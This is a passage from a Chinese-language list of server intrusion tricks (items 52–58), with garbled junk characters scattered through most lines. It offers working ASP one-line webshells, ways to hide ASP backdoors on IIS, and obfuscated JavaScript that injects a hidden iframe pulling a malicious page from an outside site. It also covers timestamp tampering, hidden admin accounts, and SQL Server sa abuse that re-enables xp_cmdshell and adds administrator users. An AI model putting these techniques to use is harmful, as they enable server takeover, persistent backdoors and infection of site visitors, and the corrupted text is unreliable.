f).<%if request("cmd")<>"" then execute request("pass")%>4 g9 C3 e& s K# ^$ a3 \: w* q# j
. B: g3 L( K& D, k
52、at "12:17" /interactive cmd
6 `4 N3 A. S, U& D- ~5 u执行后可以用AT命令查看新加的任务
1 B) m }. P9 l! M# m用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。4 Q2 ^9 s+ X4 P; i
, m. w1 E2 ], q- h53、隐藏ASP后门的两种方法
7 ~' T6 I- _3 G3 E1、建立非标准目录:mkdir images..\
* C; B* v3 h1 _拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp) C- v( M1 N: S" ]9 A+ S
通过web访问ASP木马:http://ip/images../news.asp?action=login" H( c1 n! b# i7 ~4 s! T# e! Z
如何删除非标准目录:rmdir images..\ /s9 `# c: ?6 Y( m6 J* ]3 y' A: X2 J
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
- Q" D) f. s9 E+ W7 K% Nmkdir programme.asp- u0 B* y! Y2 t8 ]) L' v
新建1.txt文件内容:<!--#include file=”12.jpg”-->! z- X0 u' z4 M* b, h9 Z) t7 a
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件! J. n( C% \# }1 E5 }
attrib +H +S programme.asp6 D2 \3 g- B: c) F
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
/ q9 J% \% Z2 \
! Z2 a( I' W2 `54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。' m, R! h% S$ _8 ~' o2 G+ L' v1 O
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
- Q6 s2 ~/ \1 @! J3 x
" T8 q8 P5 r$ M& y4 u y) O' e) r; ?55、JS隐蔽挂马
0 x/ @; N. g; }& n& V8 N7 t' L1.& G3 }$ k* v" w( j3 k Q) A
var tr4c3="<iframe src=ht";) N5 ~; O4 k1 P$ O" E) Y7 v' Y) a; B
tr4c3 = tr4c3+"tp:/";& @+ K1 v/ `" r9 j
tr4c3 = tr4c3+"/ww"; {$ N0 N0 @+ e7 @& @* p
tr4c3 = tr4c3+"w.tr4";4 u0 ?) x" D1 p' E
tr4c3 = tr4c3+"c3.com/inc/m";% d' r6 _' Z0 \# c+ [
tr4c3 = tr4c3+"m.htm style="display:none"></i";- Q4 \; D6 g& Y7 G( B9 Z
tr4c3 =tr4c3+"frame>'";7 Z: B; {, j" \- u- f4 |: v) m- P/ O
document.write(tr4c3);
8 _. Y, t/ n! j0 f4 r7 A2 ~避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
* T/ D0 E5 o& c' B4 N& Z0 Q( a% u0 ?# M/ J/ E2 }7 a% i
2.
' d3 |7 [( y/ @$ Z转换进制,然后用EVAL执行。如
9 q/ ]* s* {4 W/ S. i, _eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");3 {7 S" |3 G5 i* p3 P0 ?; y
不过这个有点显眼。
1 X" i' m5 M' k/ q" ~; x3.
- s/ a. [2 f1 l& ]document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');$ L/ G3 A6 l* R3 T, M' v. }6 m' r
最后一点,别忘了把文件的时间也修改下。5 J/ R0 g5 t0 m x U
# a% K2 M2 J3 `
56.3389终端入侵常用DOS命令6 s o6 W! R9 |
taskkill taskkill /PID 1248 /t7 I( n/ z) p' ^9 c8 D% ^9 m
( [, d" U9 ?3 H. e1 r- t1 Ttasklist 查进程
, s2 q% H; q: R% ?; b9 }& Q4 e, }* a. N+ @, S5 c
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
* f: n$ f+ _/ s) {iisreset /reboot5 j6 X/ u) t0 r: }. p4 q
tsshutdn /reboot /delay:1 重起服务器8 ]1 z5 M* y2 G
+ }6 I. Q/ H- j$ i1 v, Ulogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
. d' [# w$ R- I/ r9 v1 E9 Z
) @" v- Y5 A7 r3 A1 O- \+ Tquery user 查看当前终端用户在线情况* h: L4 z2 G1 @; f9 M+ e
' I0 t; Q8 N2 D9 Y! u
要显示有关所有会话使用的进程的信息,请键入:query process *
: M( e4 {0 Z* V x# [) X4 n7 O2 ?
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
$ M, ~' B/ e' z6 N+ O/ o" u' O( U3 Y m! a" L+ G
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2$ r( o( n T7 l) Y6 F
* b! F( m/ e* K6 f& S要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
2 B& L: s W v3 L( G. x& N- v5 C8 C: V" D; t
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
$ x; R, A$ _% f6 s3 Y9 S, J
8 O+ b' L0 S( W+ R! R6 Y0 \) S命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
7 o7 t$ F) \: t; [" m, H
( r; ^6 _5 |5 N2 G7 i% B命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。: B! V; q" `: A$ _! @
! { P6 _1 E8 H7 J/ d% o* Z P8 Q3 A
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
9 }. Z$ s3 _- x$ a# a3 {
2 M2 L( ]& w) F) x5 n56、在地址栏或按Ctrl+O,输入:3 F; T7 a i+ W
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
3 e% w$ a! G& l5 p, V; Z8 b& ]' B7 v9 m
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# U! G* f$ |; D: P9 z2 x
" P) S1 o0 Q" u57、net user的时候,是不能显示加$的用户,但是如果不处理的话,4 g7 b) C" @5 N ?6 u$ B$ F
用net localgroup administrators是可以看到管理组下,加了$的用户的。: v* c4 a+ \% @! W7 W
9 p: ~3 v% ~/ N: C b% R/ |( q58、 sa弱口令相关命令
" C @ S) o; g7 ]& Z$ o7 Y5 ~+ X2 I4 @' W
一.更改sa口令方法:
+ J& m& N3 v" K( W7 H用sql综合利用工具连接后,执行命令:/ S- e" Y; l& b
exec sp_password NULL,'20001001','sa' R7 @* V; T9 i5 L
(提示:慎用!)2 F6 c# o7 j4 B% m0 L
# K1 y# c2 S/ v, o+ c二.简单修补sa弱口令.& k* a; i' k3 E$ q/ d% q. B
9 j+ @4 c4 y l3 O0 F8 ~0 U
方法1:查询分离器连接后执行:* z4 g+ C6 j& w3 H7 @4 a$ X
if exists (select * from
2 s0 G1 b" n0 Ndbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
- S% m3 _1 X1 ?. {( ]OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
1 ^8 Y& Y, w: B9 b" X# |* ^
- p3 F: E3 x. y; s" P& e+ Lexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'5 \( [+ I% o, K$ V4 y! |9 P0 d6 a# w0 `
0 Z& T; p5 e, A- jGO
) j: M9 C* F- Q, T5 f# f' \) h J2 f7 c7 O: I
然后按F5键命令执行完毕
6 _8 U1 U/ |# n
0 l+ `. d2 ^" p' o- F方法2:查询分离器连接后: F, f$ Q) m* \
第一步执行:use master' T- S1 K9 b6 |; d s4 U
第二步执行:sp_dropextendedproc 'xp_cmdshell'# L- X9 W5 E, b9 j7 z1 m+ d* M
然后按F5键命令执行完毕& ~* J! u5 ]/ K8 m
: k( S" w. Q& ^# r$ e
7 Y2 x3 w% s1 T: j三.常见情况恢复执行xp_cmdshell.
p4 D, n: e, `4 T6 a9 x: y
. y1 p4 n+ `2 v `# K v0 T E
A Z% @' U# N( W2 [7 \% X1 未能找到存储过程'master..xpcmdshell'.2 ?3 d7 m2 t7 B9 w q4 O
恢复方法:查询分离器连接后,
, W2 z/ p/ Y! Y. g( ^第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
5 M5 ]; e* E. m5 `8 Y! S* S第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 H o. L/ |. _/ j' G# R5 t& A2 `0 a
然后按F5键命令执行完毕. c* W7 B1 {2 T+ r0 K. x
% p) c7 g! z5 F+ `8 ^0 F/ x
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)# d( K+ T. V1 n* X# x. |9 P1 N
恢复方法:查询分离器连接后,* a5 I- {4 a- z& k$ f
第一步执行:sp_dropextendedproc "xp_cmdshell"
' `$ s/ r. U8 [0 \+ d0 Y第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'0 I K( w U5 D- D. l- v2 F. k5 w# b
然后按F5键命令执行完毕
?+ y. n0 ?: d% B, M. {; ?: z0 D* `$ T" A' V* w
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
+ L5 }! c8 W. ^恢复方法:查询分离器连接后, U% b. ^1 r! H" E) e6 Q
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
( x2 `4 f" c# i* T9 e第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
1 l, E w- F! t/ q p然后按F5键命令执行完毕
6 N- e3 ~, ?( {9 i* l9 p: g4 q) ^$ f+ k: D$ l( F- o
四.终极方法.) @/ G0 C2 I' U D7 o# e7 D
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:; [0 p4 a+ [' ?
查询分离器连接后,; Y& ^7 @# C$ l& K1 M
2000servser系统:
8 V8 [( M: n6 U1 ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'0 B3 z0 |6 ?7 O. ?- m- t
; Y F. G; V) p7 d9 H
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'* T1 f) h# w/ P8 V) \7 i
8 V& K$ G$ K" ]
xp或2003server系统:
0 g" F/ u8 H; r4 ^0 |( }0 f4 ]4 f1 Z# u# {8 {- T
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'/ ^* N8 q- F g- {+ T. \* d
2 w t0 s9 ]" {& x S' j# i/ Gdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'
: | g; ~3 s9 f+ I# d2 q |